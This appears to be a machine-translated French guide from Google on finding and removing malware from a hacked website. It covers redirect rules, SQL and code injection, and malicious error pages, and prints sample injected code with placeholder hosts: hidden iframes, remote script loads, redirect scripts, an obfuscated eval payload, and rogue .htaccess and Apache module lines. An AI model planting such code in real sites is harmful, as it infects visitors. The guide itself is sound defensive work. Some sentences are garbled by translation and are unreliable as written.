Un logiciel malveillant est un logiciel ou une application mobile conçus spécifiquement pour porter atteinte à un ordinateur, un appareil mobile, le logiciel qu'il exécute ou ses utilisateurs. Pour en savoir plus sur les logiciels malveillants, consultez l'article Logiciels malveillants et indésirables.
Si votre site contient des logiciels malveillants, l'avertissement s'affiche généralement Le message Ce site risque d'endommager votre ordinateur affiché dans les résultats de recherche ou sur une page interstitielle affichée par le navigateur lorsque l'utilisateur tente de consulter votre quelque chose comme ceci:
<ph type="x-smartling-placeholder">
Pour ce faire, vous devez disposer des éléments suivants :
- Un accès administrateur shell ou de terminal aux serveurs de votre site: Web, base de données, et des fichiers.
- Vous connaissez les commandes du shell ou du terminal.
- Possibilité d'exécuter des requêtes SQL sur la base de données.
Préparation
- S'inscrire à la Search Console et confirmer que vous êtes le propriétaire du site piraté, comme décrit ici. La Search Console fournit un échantillon des pages affectées, ce qui facilite les recherches la résolution des problèmes de piratage par des logiciels malveillants beaucoup plus facilement. De plus, vous recevez un avertissement lorsque votre site est affecté par de nombreux types de logiciels malveillants ou d'autres piratages.
Consultez la page de diagnostic de la navigation sécurisée Google. pour obtenir des informations publiques concernant le danger que représente un site pour les internautes. Vous pouvez consulter l'état de votre page ou de votre site à l'aide d'une URL semblable à celle-ci:
https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>***Exemple:https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com<<page_or_site>>peut être une URL de page spécifique (http://example.com/badpage) ou l'intégralité de votre site (example.com).Évitez d'utiliser un navigateur pour consulter les pages de votre site. Comme les logiciels malveillants se propage en exploitant les failles des navigateurs, en ouvrant un logiciel malveillant dans un navigateur peut endommager votre ordinateur. À moins que les instructions pour accéder à la page directement dans votre navigateur, utilisez cURL ou Wget pour effectuer des requêtes HTTP (par exemple, pour explorer une page).
Ces outils disponibles sans frais sont utiles pour diagnostiquer les redirections et ont la flexibilité d'inclure des informations sur l'URL de provenance ou le user-agent. En plus d'un une URL de provenance ou un user-agent spécifique permet d'imiter des pirates informatiques, car les pirates informatiques peuvent ne diffuser du contenu malveillant qu'aux utilisateurs ayant des user-agents ou URL de provenance pour cibler davantage de "personnes réelles" et évitez par les propriétaires de sites et par les détecteurs de logiciels malveillants.
`curl -v --referer "http://www.google.com" <your-url>`
Voici un exemple qui spécifie à la fois un user-agent et une URL de provenance:
`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`
Nous vous recommandons de récupérer une page avec et sans
--referer "https://www.google.com", car certains logiciels malveillants ne sont activés que
lorsque les utilisateurs proviennent des résultats de recherche Google.
Créez un document pour enregistrer les résultats de cette étape. Le document va inclure (au minimum) le nom et l'emplacement de chaque fichier endommagé et des notes sur la façon dont il a été infecté, et servira de base pour Nettoyer votre site et en assurer la maintenance.
Regardez la vidéo précédente sur cette page pour savoir comment fonctionnent les logiciels malveillants et la sécurité lors de la recherche de logiciels malveillants.
Diagnostic
Déterminez quel logiciel malveillant affecte votre site:
- Ouvrez le rapport sur les problèmes de sécurité. pour votre site dans la Search Console. Développez la description de l'avertissement lié à un logiciel malveillant pour afficher une liste d'exemples de pages affectées. Notez que cette liste n'est pas exhaustive. il est possible que vous n'obteniez pas de pages d'exemple pour tous les types de logiciels malveillants sur votre site.
- Testez vos exemples de pages à la recherche des types de logiciels malveillants suivants.
Logiciel malveillant de configuration du serveur (redirections indésirables)
Un hacker a compromis votre site et redirige les visiteurs de votre site
vers leur site pirate de logiciels malveillants, probablement en modifiant le
fichier(s) de configuration. Les fichiers de configuration du serveur permettent
généralement au site
de spécifier des redirections d'URL pour des pages ou des répertoires spécifiques sur une
sur votre site Web. Par exemple, sur les serveurs Apache, il s'agit des fichiers .htaccess et httpd.conf.
Diagnostic
Consultez quelques exemples d'URL figurant dans le rapport sur les problèmes de sécurité. Une réponse à partir d'une page infectée par la "configuration du serveur" l’infection peuvent inclure le les en-têtes suivants:
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<<strong>_malware-attack-site_</strong>>/index.html
< Content-Length: 253
Identifier les fichiers concernés
Connectez-vous à votre serveur via le shell ou le terminal (le site peut être hors connexion).
si vous le souhaitez) et examinez les fichiers de configuration de serveur pertinents. Il y a peut-être plus
plusieurs fichiers de configuration
de serveur piratés sur votre site. Recherchez dans ces fichiers
directives indésirables, telles que des redirections vers des sites inconnus. Par exemple, dans
.htaccess, vous verrez peut-être une redirection semblable à celle-ci:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://<<em><strong>_malware-site_</strong></em>>/index.html** [R=301]
Injection SQL
Un pirate informatique a compromis la base de données de votre site. Par exemple, le pirate pourrait ont inséré de manière programmatique du code malveillant dans chaque enregistrement d'une base de données de sorte que lorsque le serveur charge une page nécessitant des informations provenant du le code malveillant est alors intégré dans le contenu de la page et peut nuire aux visiteurs du site.
Diagnostic
- Exécutez des requêtes sur les URL concernées dans la ligne de commande et examinez les réponse aux mots d'attaque SQL comme "iFrame" ou "eval".
Connectez-vous à votre serveur de base de données ou affichez votre base de données à l'aide d'un outil tel que phpMyAdmin. Si que vous avez utilisé les commandes Wget ou cURL, essayez de corréler les dommages détectés dans le code source de la page le code via Wget ou cURL avec les entrées réelles de la base de données. Par exemple, si que vos pages contiennent un iFrame dangereux, vous pouvez effectuer une requête SQL qui recherche du code iFrame. Exemple :
SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';Vous pouvez également vérifier le journal de la base de données et les fichiers d'erreur sur votre serveur pour une activité inhabituelle, comme des commandes SQL inattendues qui semblent inhabituelles pour des utilisateurs normaux ou des erreurs.
Résoudre le problème
Mettez à jour chaque enregistrement de la base de données infectée ou restaurez votre dernière base de données connue sauvegarde.
Injection de code
Certaines pages de votre site ont été modifiées afin d'inclure du code malveillant, comme un iFrame pour un site pirate un logiciel malveillant.
Diagnostic
Consultez certains des exemples d'URL figurant dans le rapport sur les problèmes de sécurité à l'aide de cURL ou Utilisez la commande wGet et recherchez le code suspect. Le code injecté peut prendre de nombreux types seront difficiles à trouver. Il peut être utile de rechercher des mots comme "iFrame" pour trouver du code iFrame. Recherchez aussi "script", "eval" et "unescape". Pour Par exemple, pour rechercher "iframe" dans tous les fichiers Sur les systèmes Unix:
$grep -irn "iframe" ./ | less</pre>
Voici quelques schémas courants de logiciels malveillants à rechercher.
iFrame qui charge un site malveillant:
<iframe frameborder="0" height="0" src="http://<<strong><em>_malware-site_</em></strong>>/path/file"
style="display:none" width="0"></iframe>
JavaScript ou un autre langage de script qui appelle et exécute des scripts à partir d'un site pirate:
<script type='text/javascript' src='http://<<em><strong>_malware-site_</strong></em>>/js/x55.js'></script>
Script qui redirige le serveur vers un site pirate :
<script>
if (document.referrer.match(/google\.com/)) {
window.location("http://<<em><strong>_malware-site_</strong></em>>/");
}
</script>
Code malveillant dissimulé pour ne pas être détecté:
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
Fichiers d'objets partagés conçus pour écrire de manière aléatoire du code malveillant scripts:
#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
Modèles d'erreurs malveillantes
Le modèle utilisé pour les messages d'erreur, comme "404 File not Found", est configuré pour distribuer des logiciels malveillants. De cette façon, les pirates informatiques peuvent lancer des attaques sur les URL n'existent même pas sur votre site.
Diagnostic
Demandez l'accès à une page de votre site qui n'existe pas ou qui renvoie un autre type de et examinez la réponse pour voir si elle provient d'un autre site ou qui contiennent des logiciels malveillants.
Résoudre le problème
Connectez-vous à votre serveur Web et recherchez les erreurs éventuelles dans les fichiers de configuration du serveur.
de page. Par exemple, le modèle d'erreur pour les serveurs Web Apache peut être
déclaré dans le fichier .htaccess. Voici un exemple d'entrée de fichier .htaccess
qui récupère les pages d'erreur 404 d'un site malveillant:
ErrorDocument 404 http://<<span class="red-text"><em><strong>_malware-site_</strong></em></span>>/index.html
Lorsque vous êtes prêt à nettoyer votre site, remplacez le ou les fichiers .htaccess
avec une sauvegarde non infectée connue, ou supprimez les directives ErrorDocument indésirables sur la
.htaccess fichier(s) existant(s). Veillez également à nettoyer les fichiers d'erreur réels si
sur votre site. Enfin, redémarrez votre serveur Web pour vous assurer
les modifications sont prises en compte.
Ressources chargées depuis un site infecté ou malveillant {compromised-resources}
Votre site utilise du contenu ou des ressources provenant d'un site Web connu pour contenir contenu malveillant. Il peut s'agir de fichiers JavaScript, d'images ou d'autres fichiers. C'est pourquoi votre site sera signalé comme contenant des logiciels malveillants chargés depuis sur votre site.
Diagnostic
Consultez quelques exemples d'URL figurant dans le rapport sur les problèmes de sécurité.
Résoudre le problème
- Confirmez le problème en consultant quelques-uns des exemples d'URL répertoriés dans le Rapport sur les problèmes de sécurité dans la Search Console Le navigateur doit afficher un avertissement.
- L'avertissement du navigateur vous indiquera le domaine du contenu mis en cause. Supprimez toutes les références au site marqué répertoriées dans l'avertissement du navigateur. Si le contenu d'un site signalé a été inclus à votre insu, le le problème est plus grave. Il est fort probable que votre site ait été piraté, devez continuer à examiner votre site pour détecter d'autres piratages et vulnérabilités.
- Si vous avez intentionnellement inclus du contenu issu d'un site légitime qui est devenu
et que vous souhaitez réintégrer le contenu une fois que le site signalé a été
nettoyées, vous pouvez surveiller l'état du site signalé à l'aide du
Page de diagnostics de la navigation sécurisée Google
pour ce site (
http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external}. En général, les propriétaires de sites légitimes les nettoient rapidement.
Investigation supplémentaire
Vérifiez ensuite si d'autres fichiers malveillants ou modifications sont survenus sur votre système. La ont pu modifier des pages ou des enregistrements de bases de données existants, créer entièrement de nouvelles pages contenant du spam, de fonctions écrites qui affichent du spam sur les pages non infectées ou "portes dérobées" qui permettent au pirate d'accéder à nouveau à votre site du code malveillant que vous avez supprimé.
Si votre site est en ligne, envisagez de le mettre hors connexion pour effectuer cette enquête.
Si vous disposez d'une sauvegarde non infectée de votre site, identifiez les fichiers qui ont été créées ou modifiées depuis la sauvegarde et examinez les résultats. Sur Unix vous pouvez utiliser une commande comme celle-ci pour rechercher de nouveaux fichiers:
diff -qr <current-directory> <backup-directory>
Exemple :
diff -qr www/ backups/full-backup-20120124/
également:
md5sum <current-page> <backup-page>
Exemple :
md5sum www/page.html backups/full-backup-20120124/page.html
Recherchez toute activité suspecte dans les journaux de serveur, d'accès et d'erreurs, par exemple : les tentatives de connexion infructueuses, l'historique des commandes (en particulier en tant que racine) et la création comptes d'utilisateurs inconnus. Il se peut que le pirate ait modifié ces journaux pour leurs propres besoins. Quelques exemples sont présentés dans la vidéo Identifiez la faille.
Vérifiez l'absence de redirections dans les fichiers de configuration. Vos fichiers de configuration sont
généralement nommé .htaccess et httpd.conf. Les pirates informatiques créent souvent
en fonction du user-agent, de l'heure de la journée ou de l'URL de provenance. Si vous avez besoin de
de mise à jour des fichiers de configuration, vous devrez peut-être redémarrer votre serveur
pour que les modifications soient prises en compte.
Vérifiez si les autorisations d'accès aux dossiers et aux fichiers sont trop faibles. Les pirates informatiques falsifient
car si les autorisations permises
ne sont pas détectées par le propriétaire du site,
le pirate aura un moyen
d'entrer de nouveau sur le site. Fichiers supérieurs à
644 (rw-r--r--) et les dossiers dont la taille est supérieure à 755 (rwxr-xr-x) peuvent entraîner la sécurité
les problèmes de performances. Assurez-vous que toute autorisation plus large est vraiment nécessaire. Activé
Pour les systèmes Unix, essayez:
find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;
et :
find <your-dir> -type f -not -perm 644 -exec ls -la {} \;
Si vous possédez une base de données, examinez les enregistrements un par un, à l'aide d'un outil comme phpMyAdmin.